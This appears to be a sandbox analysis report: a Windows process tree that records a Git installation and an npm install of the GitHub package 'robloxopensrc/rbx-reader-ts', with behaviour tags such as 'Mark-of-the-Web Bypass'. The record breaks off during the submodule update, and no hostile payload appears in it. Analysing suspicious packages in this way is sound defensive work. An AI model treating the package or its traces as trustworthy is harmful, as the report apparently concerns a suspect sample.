- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
  2⤵
  PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
  2⤵
  PID:1268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
  2⤵
  PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
  2⤵
  PID:5712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6124 /prefetch:8
  2⤵
  PID:1832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
  2⤵
  PID:4208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2848 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:6024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4904 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5228
- C:\Users\Admin\Downloads\Git-2.47.1-64-bit.exe
  "C:\Users\Admin\Downloads\Git-2.47.1-64-bit.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3684
- - C:\Users\Admin\AppData\Local\Temp\is-CFOR6.tmp\Git-2.47.1-64-bit.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-CFOR6.tmp\Git-2.47.1-64-bit.tmp" /SL5="$A004A,67801051,880640,C:\Users\Admin\Downloads\Git-2.47.1-64-bit.exe"
    3⤵
    - Drops file in Program Files directory
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:3280
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /d /c net session >"C:\Users\Admin\AppData\Local\Temp\is-0C3I4.tmp\net-session.txt"
      4⤵
      PID:5468
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        
        PID:3416
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:200
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "diff.astextplain.textconv" "astextplain"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3008
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "filter.lfs.clean" "git-lfs clean -- %f"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5996
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "filter.lfs.smudge" "git-lfs smudge -- %f"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4308
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "filter.lfs.process" "git-lfs filter-process"
      4⤵
      Drops file in Program Files directory
      Executes dropped EXE
      Loads dropped DLL
      PID:3616
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "filter.lfs.required" "true"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4216
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "http.sslBackend" "openssl"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1608
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "http.sslCAInfo" "C:/Program Files/Git/mingw64/etc/ssl/certs/ca-bundle.crt"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4524
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "core.autocrlf" "true"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:6016
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "pull.rebase" "false"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1232
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "credential.helper" "manager"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:484
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "credential.https://dev.azure.com.useHttpPath" "true"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5344
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "core.fscache" "true"
      4⤵
      Executes dropped EXE
      PID:3932
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "core.symlinks" "false"
      4⤵
      Executes dropped EXE
      PID:3112
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --unset-all core.fsmonitor
      4⤵
      Executes dropped EXE
      PID:2012
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --unset-all ssh.variant
      4⤵
      Executes dropped EXE
      PID:6052
  - - C:\Program Files\Git\mingw64\bin\git.exe
      "C:\Program Files\Git\mingw64\bin\git.exe" config --system --replace-all "init.defaultBranch" "master"
      4⤵
      Executes dropped EXE
      PID:5528
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /D /C ""C:\Program Files\Git\cmd\scalar.exe" reconfigure --all >"C:\Users\Admin\AppData\Local\Temp\is-0C3I4.tmp.scalar-reconfigure.out" 2>"C:\Users\Admin\AppData\Local\Temp\is-0C3I4.tmp.scalar-reconfigure.err""
      4⤵
      PID:1192
    - - C:\Program Files\Git\cmd\scalar.exe
        
        "C:\Program Files\Git\cmd\scalar.exe" reconfigure --all
        5⤵
        Executes dropped EXE
        
        PID:4232
      - C:\Program Files\Git\mingw64\bin\scalar.exe
        
        git.exe reconfigure --all
        6⤵
        Executes dropped EXE
        
        PID:820
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /C ""C:\Program Files\Git\post-install.bat" >"C:\Users\Admin\AppData\Local\Temp\is-0C3I4.tmp\post-install.log""
      4⤵
      PID:5860
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "VER"
        5⤵
        
        PID:1032
    - - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        5⤵
        Executes dropped EXE
        
        PID:3908
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:2828
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:1928
        
        C:\Program Files\Git\usr\bin\ln.exe
        
        "C:\Program Files\Git\usr\bin\ln.exe" -sf /proc/mounts /etc/mtab
        7⤵
        Executes dropped EXE
        
        PID:1572
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:4516
        
        C:\Program Files\Git\usr\bin\cygpath.exe
        
        "C:\Program Files\Git\usr\bin\cygpath.exe" -S -w
        7⤵
        Executes dropped EXE
        
        PID:2160
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:4876
        
        C:\Program Files\Git\usr\bin\expr.exe
        
        "C:\Program Files\Git\usr\bin\expr.exe" substr hosts 1 8
        7⤵
        Executes dropped EXE
        
        PID:3316
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:5244
        
        C:\Program Files\Git\usr\bin\cp.exe
        
        "C:\Program Files\Git\usr\bin\cp.exe" -p -v C:\Windows\system32\drivers\etc\hosts /etc/hosts
        7⤵
        Executes dropped EXE
        
        PID:4968
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:5168
        
        C:\Program Files\Git\usr\bin\cygpath.exe
        
        "C:\Program Files\Git\usr\bin\cygpath.exe" -S -w
        7⤵
        Executes dropped EXE
        
        PID:1164
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:4696
        
        C:\Program Files\Git\usr\bin\expr.exe
        
        "C:\Program Files\Git\usr\bin\expr.exe" substr protocols 1 8
        7⤵
        Executes dropped EXE
        
        PID:2032
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:1416
        
        C:\Program Files\Git\usr\bin\cp.exe
        
        "C:\Program Files\Git\usr\bin\cp.exe" -p -v C:\Windows\system32\drivers\etc\protocol /etc/protocols
        7⤵
        Executes dropped EXE
        
        PID:5568
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:2840
        
        C:\Program Files\Git\usr\bin\cygpath.exe
        
        "C:\Program Files\Git\usr\bin\cygpath.exe" -S -w
        7⤵
        Executes dropped EXE
        
        PID:1644
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:5404
        
        C:\Program Files\Git\usr\bin\expr.exe
        
        "C:\Program Files\Git\usr\bin\expr.exe" substr services 1 8
        7⤵
        Executes dropped EXE
        
        PID:4304
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:5560
        
        C:\Program Files\Git\usr\bin\cp.exe
        
        "C:\Program Files\Git\usr\bin\cp.exe" -p -v C:\Windows\system32\drivers\etc\services /etc/services
        7⤵
        Executes dropped EXE
        
        PID:1564
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:5204
        
        C:\Program Files\Git\usr\bin\cygpath.exe
        
        "C:\Program Files\Git\usr\bin\cygpath.exe" -S -w
        7⤵
        Executes dropped EXE
        
        PID:2372
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:4492
        
        C:\Program Files\Git\usr\bin\expr.exe
        
        "C:\Program Files\Git\usr\bin\expr.exe" substr networks 1 8
        7⤵
        Executes dropped EXE
        
        PID:4184
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:1056
        
        C:\Program Files\Git\usr\bin\cp.exe
        
        "C:\Program Files\Git\usr\bin\cp.exe" -p -v C:\Windows\system32\drivers\etc\networks /etc/networks
        7⤵
        Executes dropped EXE
        
        PID:764
      - C:\Program Files\Git\usr\bin\bash.exe
        
        usr\bin\bash.exe --norc -c "export PATH=/usr/bin:$PATH; export SYSCONFDIR=/etc; for p in $(export LC_COLLATE=C; echo /etc/post-install/*.post); do test -e \"$p\" && . \"$p\"; done"
        6⤵
        Executes dropped EXE
        
        PID:5788
        
        C:\Program Files\Git\usr\bin\rm.exe
        
        "C:\Program Files\Git\usr\bin\rm.exe" -rf /etc/post-install
        7⤵
        Executes dropped EXE
        
        PID:3304
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Program Files\Git\ReleaseNotes.html
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of SendNotifyMessage
      PID:2292
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcac323cb8,0x7ffcac323cc8,0x7ffcac323cd8
        5⤵
        
        PID:3872
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,9879914585889129437,9972460956334749707,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:2
        5⤵
        
        PID:224
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,9879914585889129437,9972460956334749707,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4776
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,9879914585889129437,9972460956334749707,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2600 /prefetch:8
        5⤵
        
        PID:5564
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,9879914585889129437,9972460956334749707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
        5⤵
        
        PID:5344
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,9879914585889129437,9972460956334749707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
        5⤵
        
        PID:4212
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,9879914585889129437,9972460956334749707,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5116 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4208
    - - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1860,9879914585889129437,9972460956334749707,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:956
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,9879914585889129437,9972460956334749707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
        5⤵
        
        PID:5624
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,9879914585889129437,9972460956334749707,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
        5⤵
        
        PID:1936
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,9879914585889129437,9972460956334749707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
        5⤵
        
        PID:1816
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,9879914585889129437,9972460956334749707,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
        5⤵
        
        PID:1288

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2328

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2000

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
PID:3504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c CALL "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
  2⤵
  PID:5572
- - C:\Program Files\nodejs\node.exe
    "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
    3⤵
    - Executes dropped EXE
    PID:3000
- C:\Program Files\nodejs\node.exe
  "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-cli.js" i github:robloxopensrc/rbx-reader-ts
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:5200
- - C:\Program Files\Git\cmd\git.exe
    git --no-replace-objects ls-remote https://github.com/robloxopensrc/rbx-reader-ts.git
    3⤵
    - Executes dropped EXE
    PID:4540
  - - C:\Program Files\Git\mingw64\bin\git.exe
      git.exe --no-replace-objects ls-remote https://github.com/robloxopensrc/rbx-reader-ts.git
      4⤵
      Executes dropped EXE
      PID:2444
    - - C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        git remote-https https://github.com/robloxopensrc/rbx-reader-ts.git https://github.com/robloxopensrc/rbx-reader-ts.git
        5⤵
        Executes dropped EXE
        
        PID:2520
      - C:\Program Files\Git\mingw64\libexec\git-core\git-remote-https.exe
        
        git-remote-https https://github.com/robloxopensrc/rbx-reader-ts.git https://github.com/robloxopensrc/rbx-reader-ts.git
        6⤵
        Executes dropped EXE
        
        PID:4380
- - C:\Program Files\Git\cmd\git.exe
    git --no-replace-objects clone https://github.com/robloxopensrc/rbx-reader-ts.git C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\git-cloneB59E8T --recurse-submodules --depth=1 --config core.longpaths=true
    3⤵
    - Executes dropped EXE
    PID:2396
  - - C:\Program Files\Git\mingw64\bin\git.exe
      git.exe --no-replace-objects clone https://github.com/robloxopensrc/rbx-reader-ts.git C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\git-cloneB59E8T --recurse-submodules --depth=1 --config core.longpaths=true
      4⤵
      Executes dropped EXE
      PID:200
    - - C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        git remote-https origin https://github.com/robloxopensrc/rbx-reader-ts.git
        5⤵
        
        PID:5340
      - C:\Program Files\Git\mingw64\libexec\git-core\git-remote-https.exe
        
        git-remote-https origin https://github.com/robloxopensrc/rbx-reader-ts.git
        6⤵
        
        PID:6036
    - - C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        git --shallow-file C:/Users/Admin/AppData/Local/npm-cache/_cacache/tmp/git-cloneB59E8T/.git/shallow.lock index-pack --stdin --fix-thin "--keep=fetch-pack 200 on Ozysbzxk"
        5⤵
        
        PID:3144
    - - C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        git rev-list --objects --stdin --not --all --quiet --alternate-refs
        5⤵
        
        PID:2736
    - - C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        git submodule update --require-init --recursive --single-branch
        5⤵
        
        PID:6032
      - C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        6⤵
        
        PID:3316
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:5244
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:3416
        
        C:\Program Files\Git\usr\bin\basename.exe
        
        "C:\Program Files\Git\usr\bin\basename.exe" "C:/Program Files/Git/mingw64/libexec/git-core\git-submodule"
        9⤵
        
        PID:6044
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:1676
        
        C:\Program Files\Git\usr\bin\sed.exe
        
        "C:\Program Files\Git\usr\bin\sed.exe" -e "s/-/ /"
        9⤵
        
        PID:5632
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:4072
        
        C:\Program Files\Git\mingw64\libexec\git-core\git.exe
        
        "C:\Program Files\Git\mingw64\libexec\git-core\git.exe" --exec-path
        8⤵
        
        PID:2428
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        7⤵
        
        PID:5420
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:2792
        
        C:\Program Files\Git\usr\bin\basename.exe
        
        "C:\Program Files\Git\usr\bin\basename.exe" -- "C:/Program Files/Git/mingw64/libexec/git-core\git-submodule"
        9⤵
        
        PID:5108
        
        C:\Program Files\Git\usr\bin\sh.exe
        
        sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-submodule" update --require-init --recursive --single-branch
        8⤵
        
        PID:3764
        
        C:\Program Files\Git\usr\bin\sed.exe
        
